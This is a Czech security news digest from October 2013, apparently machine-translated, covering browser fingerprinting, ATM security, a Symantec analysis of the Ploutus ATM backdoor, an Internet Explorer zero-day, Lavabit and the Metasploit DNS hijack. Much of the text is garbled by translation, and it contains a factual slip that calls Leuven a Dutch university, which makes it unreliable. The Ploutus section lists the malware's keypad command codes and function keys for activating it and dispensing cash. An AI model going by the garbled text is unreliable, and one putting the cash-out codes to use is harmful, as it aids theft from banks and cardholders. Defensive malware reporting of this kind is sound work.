Snímání otisků se nejčastěji provádí pomocí skriptů napsaných pro flash, prakticky všudypřítomné rozšíření pro přehrávání médií v prohlížečích, případně pro Javascript, nejrozšířenější programovací jazyk webových aplikací.
Studie nizozemské univerzity v Leuvenu je první, která se pokusila detailně zjistit rozsah snímání otisků zařízení v Internetu. Podle výsledků 145 (přibližně 1,5 procenta) z 10 000 největších webů používá ve flashi schované skripty snímající a ověřující otisk zařízení. Některé z objektů flash navíc prováděly pochybné techniky včetně zjišťování vlastní IP adresy uživatelů, kteří web navštívili stíněni serverem proxy.
404 z prvního milionu webů potom implementuje techniku otisků zařízení v jazyce Javascript, což jim umožňuje sledovat i mobilní zařízení, ve kterých nemusí flash fungovat. Skripty vytvářely seznamy systémových písem – kterých může být několik set – měřením prostoru, které na obrazovce zabraly nenápadně zobrazené řetězce.
Ke sledování uživatelů často docházelo bez ohledu na nastavení parametru Do Not Track (DNT), který má zamezit sledování uživatelů. K detekci podobných praktik lze využít nástroj FPDetective, který vytvořili autoři zmíněné studie a který bude volně dostupný v internetu. Metod a technik otisků zařízení postupně přibývá, autoři identifikovali 16 nových provozovatelů identifikačních služeb, které si majitelé webů mohou pronajmout.
Součástí studie, která bude prezentována na listopadové konferenci ACM o bezpečnosti počítačů a komunikací v Berlíně, je i analýza nástrojů Tor Browser a Fingergloves, snažících se mimo jiné právě zabránit zjišťování otisků zařízení. Bylo v nich nalezeno několik slabin, které v určitých scénářích mohou vést k identifikaci uživatele.
Vytvoření otisku zařízení může být zneužito pro různé typy podvodného marketingu, stejně tak ale může být součástí bezpečnostních řešení, snažících se například zabránit krádežím identit.
Mnoho bezpečnostních problémů bankomatů
13.10.2013 Zabezpečení | Ochrana
Stejně jako oni jsou užiteční, bankomaty jsou také velmi citlivé na manipulaci a útoky jednotlivce, kteří za peníze.
eWEEK zprávy , že na konferenci bezpečnostního sektoru, které se konalo tento týden v kanadském Torontu, Trustwave senior konzultant John Hoopes poskytované vhled do útoků, které jsou často provedeny proti Point of Sale (POS) systémy a bankomaty, a věci, obránci můžete udělat, aby se zabránilo jejich . Pokud jde o bankomatech, problémy je mnoho, říká. Pokud je síťový kabel pro počítač je dosažitelný, může být snadno Bankomat odpojen a zapojen znovu, aby se restartuje a zobrazí operační systém, který běží. Více často než ne, je to Windows XP, a obvykle unpatched. Ve skutečnosti, Hoopes zjistil, že mnozí Bankomaty jsou stále vystaveni let starých chyb, které byly opravené Microsoft před staletími. Je zřejmé, že technici nainstalovali operační systém, kdy stroj byl uveden do užívání, a nebyly dotkl se jich od té doby. velký počet bankomatů je také spuštěn v režimu správce, takže útok ještě snazší vykonat. Také pokud jde o ATM software, kód je jen zřídka, pokud vůbec, popletl a potenciální útočníci mohou najít to triviální zpětné inženýrství svůj kód a vyhledejte využitelných nedostatky. Povolení fyzický přístup k napájení a síťové kabely, které se živí bankomaty náhodných jedinci by měli mít velký ne-ne. První, protože z výše uvedených možností restartu, a za druhé proto, útočníci mohou vložit zařízení mezi ATM a sítí, a vyčenichat a manipulovat s datový tok, který je často šifrována, občas není šifrován tak, jak by mělo být. Všechny tyto problémy mohou být poměrně snadno vyřešit ATM výrobců a dodavatelů, pokud mají koncentrované úsilí. Hooper poukazuje na to, že by také myslet na dobré zámky pro skříně ATM, kabelových řešení ochrany, monitorování systému a poplašných systémů, které by zjistit, kdy ATM systém restartován nebo je potenciálně zfalšován.
Infographic: Noční můra zajištění nestrukturovaných dat
13.10.2013 Zabezpečení
Tento infographic z SealPath přichází s daty a fakty ztráty dat v podnicích: Zdroje narušení dat, trendy na trhu, technologií souvisejících s ochranou dat, atd. Klikněte na obrázek níže ke stažení kompletní infographic:
Luis Angel del Valle, generální ředitel SealPath říká: "Firmy po celém světě upřednostňování datových orientovanou zabezpečení a zlepšení ochrany osobních kontrol, protože v dnešních datových řízený svět je třeba zabezpečit nejen IT obvodu, ale také informace."
Facebook dává každý uživatel zjistitelný podle jména
13.10.2013 Zabezpečení
Opět, Facebook je skoncování s funkcí, že mnoho uživatelů ani neví, že mohl použít, ale malé, soukromí vědomí menšina je rád, že mám (měl).
Téměř před rokem, spolu s likvidací Facebook uživatelské hlasování o zásadách ochrany osobních údajů, Facebook oznámil odstranění "Kdo může vypadat svůj Timeline jménem?" nastavení, a nyní tento krok je na spadnutí. Jak Facebook Chief Privacy Officer Michael Richter uvedeno v blogu, každý míval výše uvedené nastavení - který řídil, zda by mohla být ve chvíli, kdy lidé zadali své jméno do řádku hledání Facebook -. ale ne hodně lidí, kteří ji použili "nastavení byl vytvořen, když Facebook byl jednoduchý adresář profilů a bylo velmi omezené. Například nezabránilo lidem navigace na časové ose kliknutím na své jméno v příběhu v News Feed, nebo ze společného přítele časové ose. Dnes, lidé mohou také vyhledávat pomocí Facebook Graph vyhledávání (například "Lidé, kteří žijí v Seattlu,"), což je ještě důležitější kontrolovat soukromí věcí, které sdílejí, spíše než, jak se lidé dostat do časové osy, "píše. Odstranění nastavení bude oznámeno těm, kteří přesto používat pop-up na svých účtech na Facebooku. Současně, Richter upozornil, že lidé, kteří sdílejí své příspěvky veřejně na Facebooku viz též oznámení připomene jim, že tato místa lze vidět každý, včetně lidí, které nemusí vědět. Poradil uživatele k návštěvě své nastavení ochrany osobních údajů a dále je, stejně jako jednotlivé věci, které již sdílené prostřednictvím Deníku. I když si myslím, že Facebook je právo požadovat jeho uživatelé odpovědnost za věci, které příspěvek a za rozhodování o tom, kolik chtějí sdílet se svými přáteli, to není reálný předpoklad, že mnozí na sebe vezme zodpovědnost, nebo dokonce vědí, že se očekává.
Odolných proti násilnému otevření jailbreak detekce od Arxan
13.10.2013 Zabezpečení | Mobil
Arxan oznámila novou znemožňující nedovolenou manipulaci jailbreak detekce bezpečnosti a životního prostředí snímací technologie. Kromě již existujících stráží Arxan je, které jsou spuštěny na více než 200 milionů přístrojů, tyto nové funkce umožňují podnikové třídy aplikace a mobilního bezpečnostního prostředí, aby se zabránilo ztrátu příjmů, podvodům a značky kompromis. Pro mobilní podniků, zabezpečení aplikace prostředí je důležité jako zajištění aplikaci samotnou. S uživateli, kteří chtějí obejít bezpečnostní funkce a útěk z vězení telefony v rostoucích počtech, podniky čelí zvýšeným rizikům. Aplikace spuštěné na jailbroken zařízení jsou více náchylné k útokům a představují stále se rozšiřující mobilní útoku. správu mobilních zařízení (MDM) a domácí řešení sama o sobě nestačí, protože mohou být snadno obchází sofistikovaných hackerů zaměřené na aplikace obvodu. Vzhledem k tomu, agresivní mobilní cykly pro vývoj aplikací, podniky vyžadují řešení, které posílily jejich "mobilní první" obchodní strategii s ochranou před většinou současných kybernetických hrozeb. Arxan nový Jailbreak Detection Guard rozpozná, pokud je aplikace spuštěna v jailbroken prostředí, a může vyvolat customiszed reakce na ochranu kritických a vysoce hodnotných atributy app na nezabezpečené zařízení. Dále je Jailbreak Detekční schopnost dodat s "built-in" vměšovat odolnost. Arxan je mobilní aplikace bezpečnostních řešení se také prohloubil o jiném prostředí snímací schopnosti, tzv. Resource Ověření Guard. Tato služba je vložena do mobilní aplikace pro kontrolu integrity Android a iOS balíčku zdrojů. To je důležité pro mobilní klientské aplikace udržet svou celistvost proti malwaru vkládání nebo falšování hrozbami, stejně jako být "vědoma" o stavu svého prostředí. Například by mohly být nedávno publicizeda "Hlavní klíč" zranitelnost vedoucí k škodlivého kódu injekci do pravé Android aplikace, která může být detekována tímto novým typem ochranného krytu. Společně nový Jailbreak detekce a stráže zdrojů ověřování jsou zvláště důležité pro odvětví finančních služeb kde inovace v oblasti m-commerce, mobilní P2P transakcí, saldo převodů a plateb, aby bylo kritické pro ochranu vysoce rizikových transakcí. V nedávné poznámky výzkumné společnosti Gartner Avivah Litan John Girard doporučuje, aby podniky, "Použít mobilní řešení zabezpečení aplikací pro zpevnění a mobilní aplikace aby se zabránilo jejich poškození. "a" Použít mobilní řešení bezpečnostního prostředí, aby se zabránilo mobilních zařízení před poškozen. "
Nový přístup v reálném čase odezvy bezpečnostních incidentů
13.10.2013 Zabezpečení
NetCitadel oznámila novou analytics-řízený, kontext aware přístupu pro ochranu podnikových sítí před útoky stále důmyslnější bezpečnostní a apts. Vývoj a zvýšená frekvence malware a apts snížila účinnost tradičních detekci hrozeb a prosazování řešení. S téměř 200 tisíc nových vzorků malwaru objevují každý den 1, Nové detekční řešení se objevily zjistit nové útoky, vyrábí více hrozeb než události mohou být hodnoceny nebo spravovány včas. Aby toho nebylo málo, většina organizací má jen hrstku velmi vycvičené bezpečnostní analytici, kteří jsou za úkol ručně spuštěním na všechny důležité kroky vyšetřování, ověřování, priorit a obsahující zjištěné hrozby. Výsledkem je, že rozdíl mezi odhalovat a potírat je stále širší. NetCitadel vyvíjí platformu pro správu hrozeb, které řeší bezpečnostní analýzy a inteligenci potřeby dnešních týmů Incident Response. Tento analytics-řízený přístup dodává kontext dat událostí generovaných zařízeními detekce hrozeb, jako je AMD systémy a SIEM řešení pro usnadnění rychlé a inteligentní rozhodnutí. Řešení se integruje se stávajícími bezpečnostními zařízeními, jako jsou firewally a webových serverů proxy, poskytovat real-time odezvy bezpečnostních akcí. Bez správného kontextu, je téměř nemožné stanovit priority akcí a dělají dobré bezpečnostní rozhodnutí. . Bohužel, mnoho bezpečnostních týmů nuceni shromažďovat důležitá data pomocí kontextové časově náročné ruční procesy Podle společnosti Gartner "Security platformy se musí stát kontext-aware - identita, aplikace, obsah, umístění, lokace a tak dále -, aby se lépe rozhodnutí bezpečnosti informací o moderních target útoky (ATAS). " NetCitadel je řešení přináší potřebné kontext snadno použitelné rozhraní, které umožňuje security analytici rychle ověřit, které problémy jsou skutečné a které problémy mohou být bezpečně ignorována.
Ze 100 000 dolarů uvidí nálezce chyby minimum
13.10.2013 Zranitelnosti
Velká část odměny, kterou bezpečnostní výzkumník dostal od Microsoftu za upozornění na vážnou zranitelnost Windows 8.1, připadne jeho zaměstnavateli a daňovému úřadu.
Zůstatek na bankovním účtu Jamese Forshawa v tomto týdnu narostl o závratných 100 tisíc dolarů. Microsoft jej takto odměnil za upozornění na vážnou zranitelnost v operačním systému Windows 8.1.
Jde zcela jistě o jednu z největších odměn, která kdy byla nálezci nějaké chyby vyplacena. Bohužel pro Forshawa se o většinu získaných peněz bude muset podělit s dalšími subjekty.
Jak vysvětluje sám „šťastný“ nálezce, v tomto případě půjde velká část získané odměny na konto jeho zaměstnavatele, kterým je společnost Context. „I kdyby tomu tak nebylo, po zásahu berního úředníka by se částka stejně výrazně zmenšila. Rentiérem se tedy rozhodně nestanu,“ říká s nadhledem Forshaw.
Forshaw přišel ve Windows 8.1 na bezpečnostní chybu, kterou rozhodně nelze označit za běžnou zranitelnost. Případným útočníkům by umožnila zcela obejít bezpečnostní mechanismy operačního systému a získat volný přístup k uživatelským datům.
Vyplácení odměn za nalezení bezpečnostních zranitelností se stalo již běžnou praxí. Kromě Microsoftu výzkumníky odměňují například také v Googlu. Důvod je jednoduchý. Programy obou firem jsou natolik rozsáhlé, že není v jejich silách vše ohlídat. Člověk „zvenčí“ navíc může do dané problematiky vnést úplně nový pohled.
„Microsoft i Google mají poměrně velkou bezpečnostní sekci, která aktivně vyhledává softwarové chyby v produktech a okamžitě je opravuje. Nicméně někdy mají k danému produktu prostě příliš blízko – pro les nevidí stromy,“ říká Forshaw. Bez patřičného odstupu to zkrátka někdy nejde.
Firmám se využívání externích výzkumníků vyplatí i finančně. „Jednoduše nemůžete vyhradit dostatečné množství prostředků na odhalení všech chyb. Externí výzkumníci vyjdou levněji než tým bezpečnostních expertů, který by musel pokrýt všechny úhly,“ vysvětluje Forshaw.
Některé externí badatele oslovují firmy cíleně. To byl právě i tento případ. „S lidmi z Microsoftu mám dobré vztahy. V minulosti jsem je upozornil již na řadu chyb. Proto se nyní na mě i na pár dalších výzkumníků sami obrátili,“ řekl Forshaw.
Zločinci Hit Jackpot ATM
12.10.2013 Hacking | Zabezpečení
Je dobře známo, že organizovaný zločin v Mexiku je vždy najít nové způsoby, jak krást peníze od lidí. Bankomaty (ATM) jsou jedním ze společných cílů v tomto úsilí, ale výzva je zde skutečně dostat peníze ven ze stroje. Tři nejběžnější způsoby, jak toho dosáhnout, jsou:
Únos: Zločinci unesou člověka tak dlouho, jak je potřeba stáhnout všechny peníze ze svého účtu. Doba je závislá na dostupných finančních prostředků na účtu, protože normálně tam je limit na povolené částky, které mají být vydávány za den.
Fyzicky krádež bankomatu: Zločinci odstranit bankomat a vzít ji na místo, kde mohou jít do práce přístup k hotovosti uvnitř. V tomto scénáři, ztráta hotovosti je jen jedním z důsledků jako zločinci by měli získat přístup k softwaru běžícího na bankomatu, který by mohl být reverse-inženýrství s cílem připravit útok na všech bankomatů běží stejný software.
Bankomat Odstřeďování: Zařízení jsou umístěna nad čtečkou karet, aby se krást osobní informace (PII) dat, jako je PIN čísla. Falešná překryvy numerické klávesnici lze také použít pro záznam, které stisknutí tlačítek.
Zatímco výše uvedené scénáře všichni spoléhají na vnějších faktorech, uspět by zločinci jako nic víc než způsob, jak pro ně, aby si chrlí Bankomat všechny její peníze pouhým stisknutím některých tlačítek (podobně jako demo předložené pozdní Barnaby Jack na BlackHat 2010 je konference). Bohužel pro banky, zdá se, že sny padouchy "může přijít pravda. V souběžných vyšetřováních s ostatními AV firem Symantec identifikoval tento vzorek 31. srpna 2013 a detekce byla v platnosti od 4.9.2013. Zjistíme tento vzorek jako Backdoor.Ploutus .
Infekce metodika
Podle vnějších zdrojů, je malware převedena do bankomatu fyzicky vložením nové spouštěcí disketu do jednotky CD-ROM. Spouštěcí disketa přenese malware.
Účinek
Zločinci vytvořil rozhraní pro interakci s ATM softwaru na sníženou bankomatu, a proto jsou schopni stáhnout všechny dostupné peníze z nádobách v hotovosti, také známý jako kazety.
Jedna zajímavá část poznamenat, že zločinci jsou také schopni přečíst všechny informace zadané do držitelům karet prostřednictvím bankomatu klávesnice, což jim umožňuje krást citlivé informace bez použití jakéhokoliv externího zařízení.
Ačkoli žádné potvrzení o přijetí od ostatních zemí jsou postiženy touto hrozbou by banky v jiných zemích používají stejný software Bankomat být v ohrožení.
Technické vlastnosti Backdoor.Ploutus
Běží jako služba systému Windows s názvem NCRDRVPS
Zločinci vytvořil rozhraní pro interakci s ATM software na sníženou bankomatu skrze třídu NCR.APTRA.AXFS
Jeho jméno je binární PloutusService.exe
To bylo vyvinuto s. NET technologií a zakódovány pomocí software Confuser 1,9
To vytvoří skryté okno, které lze spustit zločinci komunikovat s bankomatu
Interpretuje určité kombinace kláves, které do zločinců, například příkazy, které lze přijímat buď externí klávesnici (který musí být připojen k bankomatu), nebo přímo z klávesnice
Akce prováděné Backdoor.Ploutus
Vytvořit Bankomat ID : Náhodně generované číslo přiřazené ohrožena ATM, založený na aktuální den a měsíc v době infekce.
Aktivace ATM ID : Nastavuje časovač pro peníze vydávají. Malware se peníze vydávají pouze v rámci prvních 24 hodin poté, co byl aktivován.
Aplikujte hotovosti : peníze vydávají na základě množství požadované zločinci.
Restart (služba): Obnovit obejít časový interval.
Seznam příkazů uvedených výše musí být provedena v pořadí, protože musí používat non-prošlou aktivaci ATM ID vydávat hotovost.
Zdrojový kód obsahuje španělské názvy funkcí a nízkou anglickou gramatiku, která naznačuje, malware může být kódováno španělsky mluvících vývojářů.
Interakce s Backdoor.Ploutus pomocí klávesnice
Jak již bylo zmíněno, tento typ interakce nevyžaduje další klávesnice, které mají být připojeny.
Následující příkaz kódy, zadat pomocí klávesnice ATM a jejich účel jsou následující:
12340000 : Chcete-li otestovat, zda je klávesnice přijímat příkazy.
12343570 : Vytvořit Bankomat ID, který je uložen v položce DATAA v souboru config.ini.
12343571 XXXXXXXX: Má dvě akce:
Aktivace Bankomat ID generováním aktivačního kódu na základě kódovaného ATM číslo a aktuální datum. Tato hodnota je uložena v DATAC položky v souboru config.ini. Osm bajtů načítají musí být platná kódovaný ATM ID generované funkce nazývá CrypTrack (). Platný ATM aktivační kód musí být získáno, aby ATM obejít hotovosti.
Generování časového úseku: Nastavuje časovač pro peníze vydávají, bude hodnota uložena v datab položky v souboru config.ini.
12343572 XX: Příkazy bankomat na peníze vydávají. Odstraněné číslice představují počet účtů k okamžitému použití.
Interakce s Backdoor.Ploutus přes GUI
Tato metoda vyžaduje použití externí klávesnice.
F8 = Pokud Trojan je okno skryto pak je zobrazí na hlavní obrazovce bankomatu, což zločinci posílat příkazy.
Po Trojan se zobrazí okno, následující klíčové příkazy vydané stisknutím příslušné klávesy na klávesnici:
F1 = Generovat Bankomat ID
F2 = Aktivovat Bankomat ID
F3 = dávkujte
F4 = Zakázat Trojan okno
F5 = KeyControlUp
F6 = KeyControlDown
F7 = KeyControlNext
F8 = KeyControlBack
Obrázek. Trojan klávesové zkratky
Aplikujte proces ohrožena
Je jasné, že zločinci mají reverzní inženýrství ATM softwaru a přišel s rozhraním k interakci s ním, a přestože nejsme ATM architekti, založené na kódu Prověřili jsme my můžeme odvodit, že Backdoor.Ploutus má následující funkce :
To bude identifikovat dávkovače zařízení v bankomatu.
To pak dostane počet kazet v zásobníku a zatížení je. V tomto případě se předpokládá, že malware je maximálně čtyř kazet v zásobníku, protože ví, že se koncepce ATM modelu.
Dále se vypočítá částku upustit na základě vyúčtování poskytnutých počtu, který je vynásobený hodnotou peněžních jednotek.
To pak spustí vydávají hotovost operaci. Pokud se kterýkoli z kazet mají méně než 40 jednotek (účty) jsou k dispozici, pak místo dávkování požadovanou částku, bude vydávat všechny své zbylé peníze uložili k dispozici v té kazetě.
Nakonec to bude opakovat krok pro všechny zbývající čtyři kazety, dokud se všechny peníze zpět z bankomatu.
Bankomaty lze chrlit hotovosti na místě, blízko vás ...
Co tento objev zdůrazňuje, je zvyšující se úroveň spolupráce mezi tradičními fyzický svět zločinců s hackery a zločinci. Se stále rostoucí využití technologií ve všech aspektech bezpečnosti, tradiční zločinci si uvědomují, že k provedení úspěšné loupeže, nyní vyžadují jiný soubor dovedností, které nebyly požadovány v minulosti. Moderní zloději bankovní den, nyní je třeba kvalifikovaných IT odborníků z praxe o jejich týmu, které jim pomohou plnit jejich loupeže. Tento typ, co se děje nejen ve filmech, to se děje v reálném životě, možná u bankomatu u vás.
Nový Internet Explorer Zero-day útoky proti Cílená v Koreji a Japonsku
12.10.2013 Zranitelnosti | Hacking
V Microsoft Patch Tuesday pro říjen 2013 společnost vydala MS13-080 řešit dvě zásadní chyby, které byly aktivně využívány v omezených cílených útoků. První kritická chyba v aplikaci Internet Explorer, Microsoft Internet Explorer chyby zabezpečení poškození paměti (CVE-2013-3893), byla projednána v dřívější blogu společnosti Symantec .
Druhým zásadním chyba v aplikaci Internet Explorer je prohlížeč Microsoft Internet Explorer Chyba zabezpečení poškození paměti (CVE-2013-3897). V blogu od Microsoftu , společnost popisuje, jak tento problém je use-after-bez zranitelnost CDisplayPointer spustil s onpropertychange obslužnou rutinu události. Blog pokračuje vysvětlením, jak exploit využívá JavaScript, haldy sprej přidělit malé ROP řetěz kolem adresu 0x14141414. Když nalezený v divočině, byl navržen tak, aby exploit zaměřují pouze na Internet Explorer 8 v systému Windows XP pro korejské a japonské jazykové bázi uživatele. Pro zákazníky společnosti Symantec, následující je ochrana již u tohoto útoku:
Antivirus:
Trojan.Maljava
Trojan.Malscript
Backdoor.Trojan
Downloader.Tandfuy
Intrusion Prevention System:
Web útok: Škodlivý JavaScript Heap Spray Generic
Symantec telemetrie ukazuje, že útok využívají CVE-2013-3897 začalo kolem 11.9.2013 a že ovlivněn především jihokorejské uživatelům, kvůli tomu, jak se webové stránky na populární korejské blogů stránky slouží k přesměrování uživatele na místě konání využít.
Symantec nadále vyšetřuje tento útok s cílem zajistit, že nejlepší možná ochrana je k dispozici. Jako vždy doporučujeme, aby uživatelé zachovat jejich systémy up-to-data s nejnovějšími oprav softwaru. Rovněž doporučujeme zákazníkům využívat nejnovější technologie Symantec a začlenit nejnovější Norton spotřebitele a Symantec Enterprise řešení , aby co nejlépe chránit před útoky tohoto druhu.
Aktualizace - 09.10.2013:
Společnost Symantec vydala další IPS podpis k ochraně proti CVE-2013-3897:
Web útok: Internet Explorer poškození paměti CVE 2013-3897
Update - 11.10.2013:
Společnost Symantec vydala další AV detekce pro ochranu proti CVE-2013-3897:
Bloodhound.Exploit.518
Lavabit Zakladatel odmítl být "Listening Post" na FBI
12.10.2013 Zabezpečení | Ochrana
Tváří v tvář neudržitelné rozhodnutí stát to, co nazval "naslouchá" pro FBI, Lavabit zakladatel Ladar Levison řekl, že etickou povinnost svým zákazníkům a Společenství vypnutí zabezpečeného e-mailovou službu používá informátorů NSA Edward Snowdena.
Levison, který tento týden podal odvolání k soudu náročné SSL klíče, které by uvolnil veškerý provoz přicházející dovnitř a ven z jeho podnikové síti, dal rozsáhlý rozhovor s rádiem CBC aktuálního programu . Řekl kanadské prokázat, že jeho společnost je osud byl zpečetěn den FBI se ukázal na jeho prahu, kteří hledají pomoc, protože kdyby se obrátil na klíče v tajemství federálních úřadů a bylo zjištěno, že Lavabit zákazníci utekli.
Levison řekl, že věří, že jsou tři věci, které by měly být v držení strach a nade vše utajení: systém hesla, šifrovací klíče a zdrojový kód.
"Byly ty náročné šifrovací klíče. Byly náročné na heslo pro mé podnikání 'identity a poté, co měl, mohli vydávat za své podnikání a zachytit vše, co přichází dovnitř a ven z mé sítě: hesla, čísla kreditních karet, uživatelská jména, obsah e-mailu, rychlých zpráv, všechny , který byl zajištěn tento soubor šifrovacích klíčů, "řekl Levison.
Levison řekl, že FBI chce sledovat všechny pohyby svých zákazníků, a to nejen Snowdenová let, jehož jméno bylo redigován ze soudních dokumentů, jako cíl FBI. Komentář si zaslouží vědomí, protože tento týden během CATO Institute programu celodenní dohled na NSA , ACLU hlavní technolog Chris Soghoian uvedenými společnostmi, jako Lavabit, bezpečné zpracování zpráv poskytovatele Silent Circle a bezpečné zálohování specialisté SpiderOak, se rozlišují podle soukromí a bezpečnostní prvky ve svých produktech .
"Spojené státy jsou lídrem v oblasti malé a střední podniky, které poskytují bezpečné komunikační služby," Soghoian řekl během panelové diskuse. "Když americká vláda nutí k Lavabit dodržovat, je to rozsudek smrti. Dodržujte, a vaše reputace je zničena. Bezpečné komunikační služby jsou v ohrožení. Měli bychom chtít tuto část ekonomiky k růstu. "
Levison zopakoval během CBC rozhovoru, který nechtěl rozvrátit důvěru jeho společnost postavit se svým uživatelům otočením po klávesách v tajnosti a jsou nuceni ze zákona mlčet o tom, i když věřil, že FBI byla nad její statutární orgán v náročných Lavabit SSL klíče.
"Měl jsem lidi mi říkají, že vláda ji popisuje jako mezera v jejich síť epidemiologického dozoru," řekl zabezpečených zpráv služeb, jako je Lavabit. Vláda dokonce popsal svou frustraci Tor anonymita sítě v Snowdenová dokumentech, zejména prezentaci NSA názvem "Tor zapáchá," propuštěn Guardian minulý týden. "Jsi jeden z mála služeb ponechány v USA nejsou aktivně sleduje," řekl Levison mu bylo řečeno. "Chtěli uzavřít tu mezeru ve své monitorovací síť. Ale kvůli tomu, jak to bylo navrženo, jediný způsob, jak uzavřít tu mezeru měl dát monitorovací zařízení v síti a požadovat své šifrovací klíče. Pár, který se zuřivostí, s níž se chtěl udržet v tajnosti, že to ještě více nepříjemné. "
Levison řekl sága začala v květnu, kdy agent FBI nechal vizitku na dveře spolu s poznámkou, žádat jej o schůzku. Levison a agent výměna e-mailů a Levison řekl, že FBI chce klást otázky o jeho služby, zjednodušení procesu podávání obsílky a dostat ho zapsal do Infragard.
Lavabit byl POP nebo IMAP e-mailových služeb nabízí bezplatnou službu spolu s placenou verzi, která také nabízí bezpečné úložiště, které je součástí šifrování e-mailových zpráv. Řekl, že FBI chce provádět dohled na nejmenovaný zákazník-Levison řekl, že nevěděl, kdo Snowdenová byl v té době a chtěl schopnost zachytit nejen své heslo, ale obsah, nahrát a poslat jej zpět na své servery.
"Když FBI poprvé oslovil mě se soudním příkazem dne 28. června, řekli mi, že jedou po obsahu, hesla a metadat," řekl CBC Levison. "Teprve když jsem si právníka jsem si uvědomil, že má právo pouze na metadata. Ve skutečnosti jsem chtěl přidat kód, který by přihlášení metadata denně a zase, že se k nim. FBI odmítl nabídku a pokračovala ve své SSL klíče. "
Levison řekl, že FBI chce shromažďovat metadata a další informace na vlastní pěst z jeho podnikové síti, a odmítl mu transparentnosti, které on žádal, aby byly sběr dat pouze na tomto jednom konkrétním zákazníkem.
"Říkali, že" Dejte nám Vaše osobní údaje a věřte nám, "řekl Levison. "A to není obhajitelné pozice pro mě."
Wired dnes oznámila na odvolání Levison je na 4. ročníku soudu USA obvodní žádostí a má také plnou 42-stránkový dokument je k dispozici na jeho internetových stránkách.
Falešná Objednat faxem na registrátora vede ke znetvoření Metasploit
12.10.2013 Kriminalita | Zabezpečení
Pro-Palestina hacker kolektivní šel ze staré školy v Takedown na Metasploit a Rapid7 webových stránek dnes.
Metasploit tvůrce a HD Moore potvrdil přes Twitter, že Metasploit.com byl hacknutý přes falešnou žádost změny DNS zaslané faxem na svého tajemníka, Register.com.
"Hacking jako by to bylo 1964," Moore tweeted před krátkou dobou.
Hacking skupina známá jako KDMS unesli DNS záznamy a nahradil příslušné dvě místa "domovské stránky, s poznámkou, prohlašovat, odpovědnost za tento útok a podobné hacky proti jiným bezpečnostních společností.
"Ty jsi jeden z našich cílů," psali. "Proto jsme tady." Skupina také zanechal politicky nabitou prohlášení týkající se osvobození Palestiny.
DNS únos Útok byl vyřešen během jedné hodiny, řekl Moore.
"Přijali jsme opatření k řešení tohoto problému, a obě lokality jsou nyní uzamčeny," Rapid7 uvedl v prohlášení. "Omlouváme se za přerušení služeb, a neočekávám žádné další důsledky pro naše uživatele a zákazníky v tomto okamžiku. Budeme všichni vyslán jako bychom se dozvědět více, ať komunita vědět, jestli je třeba jednat. "
Moore varoval v jiném souboru zpráv, Twitter, že tato skupina má schopnost změnit jakoukoli doménu zaregistrovali Register.com. On také potvrdil Metasploit a Rapid7 nastavení DNS dočasně ukázal 74 [.] 53. [.] 46. [.] 114.
Začátkem tohoto týdne, KDMS prohlásil odpovědnost za útok na podobný jinému registrátorovi Network Solutions. Skupina byla schopna změnit DNS záznamy spravované Network Solutions pro řadu bezpečnostních agentur a přesměrovat provoz na Hacker kontrolované domény.
LEASEWEB, velký poskytovatel hostingu, zveřejněny v pondělí, že zjištěné nebezpečné činnosti ve své síti a hackery se podařilo přesměrovat provoz z leaseweb.com do jiné domény v DNS záznamy byly změnilo.
"Žádné vnitřní systémy byly ohroženy," LEASEWEB napsal na jeho blogu v pondělí. "Jedním z bezpečnostních opatření máme v místě je k ukládání dat zákazníka odděleně od všech veřejně přístupných serverů, nemáme žádný náznak toho, že data zákazníků byla ohrožena v důsledku tohoto DNS únosu."
Zpočátku, to bylo věřil, že hack LEASEWEB se týkala zneužít chyby zabezpečení WHMCS, ale LEASEWEB řekl, že to není tento případ.
"Právě teď, zdá se, že únosci získali správce domény heslo a používají tyto informace pro přístup k registrátora," řekl LEASEWEB.
Tento článek byl aktualizován na 11 hod. ET s prohlášením Rapid7.
Mobile Security trendy, obavy a misperceptions
12.10.2013 Mobil | Zabezpečení
PayPal a National Cyber Security Alliance představila výsledky z nového Zogby Anketa zvýrazňuje nejnovější trendy, obavy a nepochopení, kolem mobilních zabezpečení a obchodu. národní průzkum více než 1000 dospělých Američanů podtrhuje, jak hluboce zakořeněné v každodenním životě Američana mobilní zařízení se stávají . Například dvě třetiny lidí dotazovaných v průzkumu nám řekl, že jeho smartphone není nikdy dál než jeden pokoj pryč, a jeden z deseti z nich, aby jejich telefon po ruce všude, kam jdou, s možnou výjimkou koupelny. Kromě toho průzkum zdůraznil rostoucí význam mobilních zařízení jako nástroj pro nakupování, s jedním ze čtyř respondentů hlásí, že absolvovat alespoň jednu transakci za den na svém smartphonu, zatímco jeden ze šesti říkají, že to, aby alespoň 25 procent všech svých nákupů na svém smartphonu . "Mobilní zařízení představují jedinečné bezpečnostní výhody, včetně informací o poloze a biometrické autentizace. Podle našeho průzkumu, více než polovina mobilních spotřebitelů jsou pohodlné využívání biometriky ověřit sami na mobilních zařízeních. Mnoho uživatelů si neuvědomuje, že informace o poloze mohou pomoci odhalit a zabránit podvodné transakce. Například, pokud transakce se koná v San Francisku a jeden v Dallasu o pár minut později, můžeme vyšetřovat podezřelé aktivity, "řekl Andy Steingruebl, ředitel ekosystémů zabezpečení, PayPal. Průzkum také odhalil všeobecný pocit neklidu o zabezpečení finančních informací na mobilních zařízeních, pokud ke ztrátě nebo odcizení, a dal jasně najevo, že mnozí lidé nejsou podniknout kroky nezbytné používat své mobilní zařízení bezpečně. Například téměř 70 procent Američanů věří, že ukládání informací o platbách jejich smartphone je nebezpečné. Průzkum také zjistil, že 63 procent lidí, kteří nemají jasnou představu o tom, co finanční informace jsou uloženy na jejich smartphonů a více než polovina neblokují jejich mobilní zařízení pomocí kódu PIN. NCSA a PayPal nabízí následující tipy: vždy aktivujte PIN nebo zamykací funkce pro mobilní zařízení: PIN je nejjednodušší a nejdůležitější věc, kterou můžete udělat, aby byla zajištěna bezpečnost na svém mobilním zařízení, zejména je-li ke ztrátě nebo odcizení. Automatizace aktualizace softwaru: Mnoho softwarových programů automaticky připojit a aktualizovat bránit proti známým rizikům. Zapnutí automatických aktualizací na vašem mobilním zařízení, pokud je to k dispozici na objednávku. Používejte zdravý rozum při stahování aplikací: Neznámé nebo přeskupují aplikace mohou obsahovat škodlivý software navržen tak, aby krást finanční informace z mobilního zařízení, takže vždy koupit nebo stáhnout aplikace od firem, kterým důvěřujete a zkontrolovat recenze. Při instalaci nových aplikací, recenze oprávnění a rozhodnout, zda jste ochotni poskytnutí přístupu, že žádost žádá o. Enable "Find My Device": Pokud váš telefon, dopravce nebo antivirový software podporuje "najít mé zařízení" funkce, je to dobrý Myšlenka pro jeho aktivaci. Tato funkce vám pomůže najít váš přístroj, 